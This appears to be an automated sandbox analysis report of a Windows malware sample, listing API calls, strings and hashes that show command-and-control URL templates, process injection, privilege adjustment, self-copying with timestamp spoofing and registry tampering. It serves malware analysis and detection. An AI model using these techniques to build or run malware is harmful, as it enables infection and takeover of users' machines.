                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004013ED
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 004013FC
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 00401405
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle$Create$FileInfoObjectProcessSingleStartupWait
                                                                                                                                                                      • String ID: --k33p
                                                                                                                                                                      • API String ID: 881816827-1573217081
                                                                                                                                                                      • Opcode ID: 5c9f2ae24bbf38b8e4d1a78f3c05765d0a18033d6e5426841d8ad069630d6b3d
                                                                                                                                                                      • Instruction ID: 3f95ffb7ecc753adf67741720bf5132c3bbf7ea7650a4e902ed5c82167082f99
                                                                                                                                                                      • Opcode Fuzzy Hash: 5c9f2ae24bbf38b8e4d1a78f3c05765d0a18033d6e5426841d8ad069630d6b3d
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C01813180420476D6213A36AC07F0F7FA89B4576CF210A3DF959351EAE67D663D42AF
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wsprintf$lstrcpylstrlen
                                                                                                                                                                      • String ID: %02X$http://%s.biz/d/G?$p!A
                                                                                                                                                                      • API String ID: 1876335253-3368850760
                                                                                                                                                                      • Opcode ID: cb09279badd15ee99111056726957111c3d85b17a551844977e1177323dfd80f
                                                                                                                                                                      • Instruction ID: 2cea46374afef77fdc915a1e9f7db235c3865f046913e12eac0c1d1ce8585de9
                                                                                                                                                                      • Opcode Fuzzy Hash: cb09279badd15ee99111056726957111c3d85b17a551844977e1177323dfd80f
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F410331C002189BDB11EF68CD8979EBBF5BF40308F150176E815BB2D2D3B9A919C799
                                                                                                                                                                      APIs
                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00401D9F
                                                                                                                                                                      • connect.WS2_32(00000000,?,00000010), ref: 00401DB3
                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00401DC9
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 00401DDB
                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00401DF8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ioctlsocket$ErrorLastconnect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1886816560-0
                                                                                                                                                                      • Opcode ID: 9e80b3ac6c6475ff1c6574f67f9f1b28db439d7aba4eb792491afc0fea029df5
                                                                                                                                                                      • Instruction ID: 443f35bcad443bf4521d197b8b602cf4c8bc99f5fac3635e2f32846607df0921
                                                                                                                                                                      • Opcode Fuzzy Hash: 9e80b3ac6c6475ff1c6574f67f9f1b28db439d7aba4eb792491afc0fea029df5
                                                                                                                                                                      • Instruction Fuzzy Hash: E53191B15042005AE230AA65DD45FDF76EC9B8531CF00073EF999A62D1E678A62982EB
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00405EB0), ref: 0040193D
                                                                                                                                                                      • wsprintfA.USER32 ref: 00401953
                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000300), ref: 0040197D
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000300,?,?,?,?,?,00020019,?,?,?,00405EB0), ref: 0040198D
                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(?), ref: 0040199A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDeleteEnumOpenwsprintf
                                                                                                                                                                      • String ID: %s\%s
                                                                                                                                                                      • API String ID: 4202809218-4073750446
                                                                                                                                                                      • Opcode ID: bc1c0bbb8f76672b1839e5cdb49d41e6cb4f6e9dc379d8bdb7dadbb7b60f7000
                                                                                                                                                                      • Instruction ID: 17f0bcb135b28bc178a216f8b2dfa9435dc5451e8c8b02a629b5be3cc13ba035
                                                                                                                                                                      • Opcode Fuzzy Hash: bc1c0bbb8f76672b1839e5cdb49d41e6cb4f6e9dc379d8bdb7dadbb7b60f7000
                                                                                                                                                                      • Instruction Fuzzy Hash: C601ACB2A042047BE52075266D03F9B76ECCBC574CF11007AF909B61D1E5799F2981BF
                                                                                                                                                                      APIs
                                                                                                                                                                      • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00401F45
                                                                                                                                                                      • recv.WS2_32(00000000,?,?,00000002), ref: 00401F5E
                                                                                                                                                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 00401F7E
                                                                                                                                                                      • recv.WS2_32(00000000,?,-00000001,00000000), ref: 00401FB4
                                                                                                                                                                      • recv.WS2_32(00000000,?,00000000,00000000), ref: 00401FC6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: recv$select
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 873784944-0
                                                                                                                                                                      • Opcode ID: 331c4b56a962cc5ab22ade2b3a75bc455250cfa2f4922ab3eade63a1b2494d84
                                                                                                                                                                      • Instruction ID: c66e6617afff8c9d9109827ab4c11b99613a78ce40c43f432ca9f356368ad492
                                                                                                                                                                      • Opcode Fuzzy Hash: 331c4b56a962cc5ab22ade2b3a75bc455250cfa2f4922ab3eade63a1b2494d84
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A31097040C3429BD731DE14C984B6BBAD8EB81358F24453FF589A62D1E3BD8445D7A7
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003), ref: 00403526
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,?,00000012), ref: 00403543
                                                                                                                                                                      • Sleep.KERNEL32(00001388,00000012), ref: 00403550
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$Sleep
                                                                                                                                                                      • String ID: Default Flags
                                                                                                                                                                      • API String ID: 3593280086-1793642065
                                                                                                                                                                      • Opcode ID: a5b68f8c3ddcba11c1e75a3cc52f21bfd238a8e0f43b38b7b4c9a5446ecc60c5
                                                                                                                                                                      • Instruction ID: c183a8bf8b1eb437f9bd20ceed0a90573d3401291b8ece137b7e57e0eade4e67
                                                                                                                                                                      • Opcode Fuzzy Hash: a5b68f8c3ddcba11c1e75a3cc52f21bfd238a8e0f43b38b7b4c9a5446ecc60c5
                                                                                                                                                                      • Instruction Fuzzy Hash: 68E04F71A8030472D7712639AE4BF477A3467A1B09F11007BB906398C7A5B51329D9AA
                                                                                                                                                                      APIs
                                                                                                                                                                      • wsprintfA.USER32 ref: 004024A3
                                                                                                                                                                        • Part of subcall function 00402030: lstrcpyA.KERNEL32(?,?), ref: 00402065
                                                                                                                                                                        • Part of subcall function 00402030: lstrlenA.KERNEL32(00000000,?), ref: 0040206E
                                                                                                                                                                        • Part of subcall function 00402030: htons.WS2_32(00000000), ref: 004020C9
                                                                                                                                                                        • Part of subcall function 00402030: socket.WS2_32(00000002,00000001,00000006), ref: 0040213E
                                                                                                                                                                        • Part of subcall function 00402030: closesocket.WS2_32(00000000), ref: 00402169
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2318488636.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2318475437.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318517554.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318531156.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2318543719.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: closesockethtonslstrcpylstrlensocketwsprintf
                                                                                                                                                                      • String ID: 12@$http://%s/d/rpt?%s$urlinj_creat
                                                                                                                                                                      • API String ID: 4197103552-2858504077
                                                                                                                                                                      • Opcode ID: f9e1d899c8cb631e133cdf2d4e1ab3e6813410de5d1cdf2efe6631ca7b0b0578
                                                                                                                                                                      • Instruction ID: 88ec9d7906897b8114724b1b79faff9a7f04a0d329b8cb3f5de5d04a505f717c
                                                                                                                                                                      • Opcode Fuzzy Hash: f9e1d899c8cb631e133cdf2d4e1ab3e6813410de5d1cdf2efe6631ca7b0b0578
                                                                                                                                                                      • Instruction Fuzzy Hash: ECE06DB160525017E310B669AC86BDB268C9B44388F50453EBB49B32C6E9BDAC4086AA
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00403A27
                                                                                                                                                                      • GetVersionExA.KERNEL32(004120D0), ref: 00403A43
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00403A74
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00407014), ref: 00403AA2
                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403ACC
                                                                                                                                                                      • GetCommandLineA.KERNEL32(00000104), ref: 00403AD4
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00403AF2
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00403B09
                                                                                                                                                                      • Process32First.KERNEL32(?,?), ref: 00403B32
                                                                                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,?), ref: 00403B6A
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?), ref: 00403B7B
                                                                                                                                                                      • Process32Next.KERNEL32(?,?), ref: 00403B94
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403BAC
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,000000FF), ref: 00403BB5
                                                                                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00403BC2
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403BE9
                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00403BF6
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateRemoteThread), ref: 00403C23
                                                                                                                                                                      • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,00000104), ref: 00403C86
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtAllocateVirtualMemory), ref: 00403C96
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtWriteVirtualMemory), ref: 00403CA6
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtShutdownSystem), ref: 00403CB6
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 00403CC6
                                                                                                                                                                      • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?,?,?,?,?,00000000,NtAllocateVirtualMemory), ref: 00403CE7
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 00403D13
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQueryInformationToken), ref: 00403D2E
                                                                                                                                                                      • NtQueryInformationToken.NTDLL(?,00000002,00000000,00002000,?), ref: 00403D82
                                                                                                                                                                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,00002000,?), ref: 00403DEC
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00403E2B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004070C4), ref: 00403E50
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000104), ref: 00403E7F
                                                                                                                                                                      • WSAStartup.WS2_32(00000002,?), ref: 00403E97
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403E9F
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00000104), ref: 00403EA6
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00403EAD
                                                                                                                                                                      • LoadLibraryA.KERNEL32(rasapi32.dll,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00403EDA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004070E4), ref: 00403F01
                                                                                                                                                                      • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00403F34
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00407105), ref: 00403F5B
                                                                                                                                                                      • LoadLibraryA.KERNEL32(wininet.dll), ref: 00403FD9
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004071CC), ref: 00404042
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004071DA), ref: 00404052
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004071EB), ref: 00404062
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004071FC), ref: 00404072
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,0040720F), ref: 00404082
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404347
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,00000000), ref: 00404366
                                                                                                                                                                      • ReadFile.KERNEL32(?,004120C0,00000010,?,00000000,?,?,00000002,00000000), ref: 00404386
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,004120C0,00000010,?,00000000,?,?,00000002,00000000), ref: 00404392
                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00697ED0), ref: 0040445F
                                                                                                                                                                      • wsprintfA.USER32 ref: 004044BC
                                                                                                                                                                      • CreateMutexA.KERNEL32(0040F4FC,00000001,qnd_b__-13,?,?,?,?,?,?,?,?,00000000), ref: 004044D0
                                                                                                                                                                      • GetLastError.KERNEL32(qnd_b__-13,?,?,?,?,qnd_b__-13,?,?,?,?,?,?,?,?,00000000), ref: 004044E4
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00404506
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(00000000,ShellRegEx,?,?,?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 00404532
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,ShellRegEx,?,?,?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 0040453E
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 0040456E
                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 0040458C
                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00697ED0), ref: 004045C1
                                                                                                                                                                      • OpenProcess.KERNEL32(00100201,00000000,?), ref: 004045DE
                                                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 00404603
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00404613
                                                                                                                                                                      • SetPriorityClass.KERNEL32(?,00000040), ref: 00404633
                                                                                                                                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 00404658
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00697ED1,00001388), ref: 0040468F
                                                                                                                                                                      • CloseHandle.KERNEL32(00697ED1,00001388), ref: 00404698
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 004046BC
                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000080), ref: 004046C5
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00020019,?,?,?,?,?,?,?,?,qnd_b__-13), ref: 004046F4
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 0040472B
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412170,?,?,?,0040F4FC,?,00000000), ref: 00404766
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00404790
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000012,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 004047A1
                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy), ref: 004047BA
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040F4FC,?,00000000), ref: 004047CC
                                                                                                                                                                      • ExitProcess.KERNEL32(00000000,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 004047E2
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 00404804
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000,?,?,?,qnd_b__-13), ref: 0040484E
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 0040487A
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Extended Flags,00000000,00000000,004120C4,?,?,?,0040F4FC,?,00000000,?,?,?,qnd_b__-13), ref: 004048B1
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Extended Flags,00000000,00000003,004120C4,0000000C,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 004048D7
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,004120C4,?,?,?,0040F4FC,?,00000000,?,?,?,qnd_b__-13), ref: 004048E9
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%ComSpec%,?,00000104,?,?,?,?,?,?,?,004120C4,?,?,?,0040F4FC,?), ref: 00404906
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404925
                                                                                                                                                                      • GetFileTime.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004120C4,?), ref: 00404954
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004120C4,?), ref: 00404963
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 00404998
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00411030,?,00000100,?,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 004049A9
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00697ED0,?,00411030,?,00000100,?,?,00000104), ref: 004049B0
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,%CommonProgramFiles%\System\,?,?,?,?,?,?,00000104), ref: 004049E6
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00697ED0,?,%CommonProgramFiles%\System\,?,?,?,?,?,?,00000104), ref: 004049ED
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,?,%CommonProgramFiles%\System\,?,?,?,?,?,?,00000104), ref: 004049FC
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,%AppData%\,?,?,?,?,?,?,?,?,?,%CommonProgramFiles%\System\), ref: 00404A2B
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00697ED0,?,%AppData%\,?,?,?,?,?,?,?,?,?,%CommonProgramFiles%\System\), ref: 00404A32
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,?,%AppData%\,?,?,?,?,?,?,?,?,?,%CommonProgramFiles%\System\), ref: 00404A48
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000,?,?,00000100,?,?,00000104), ref: 00404A8F
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AA9
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,004120C0,00000004,?,00000000,?,?,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AC3
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,004120C0,00000004,?,00000000,?,?,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AC9
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000100,00000001,00000000,00000003,00000000,00000000,?,?,00000100,?,?,00000104), ref: 00404AF2
                                                                                                                                                                      • SetFileTime.KERNEL32(00000000,?,?,?,00000000,?,?,00000100,?,?,00000104), ref: 00404B1E
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,00000100,?,?,00000104), ref: 00404B27
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,00000100,?,?,00000104), ref: 00404B3C
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000021,?,?,?,00000100,?,?,00000104), ref: 00404B48
                                                                                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00404B55
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00404B75
                                                                                                                                                                      • ExitProcess.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000100,?,?,00000104), ref: 00404B7F
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000104), ref: 00404BA5
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 00404BC3
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 00404BF8
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 00404C04
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00001000,00401379,?,00000000,?), ref: 00404C3F
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 00404C48
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,0040F520,?), ref: 00404C95
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00404CB5
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00411030,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404CC6
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00698100,?,00411030,?,00000104), ref: 00404CCD
                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404CF3
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,00000104), ref: 00404D0F
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00002710,?,?,?,?,?,00000104), ref: 00404D1E
                                                                                                                                                                      • Sleep.KERNEL32(000007D0,?,?,?,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404D30
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404D48
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404D63
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,0040F580,00000C00,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00404D9D
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00404E01
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E3B
                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00404E74
                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?), ref: 00404EA9
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00404EB8
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00404ED7
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(?,Debugger,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00404EEB
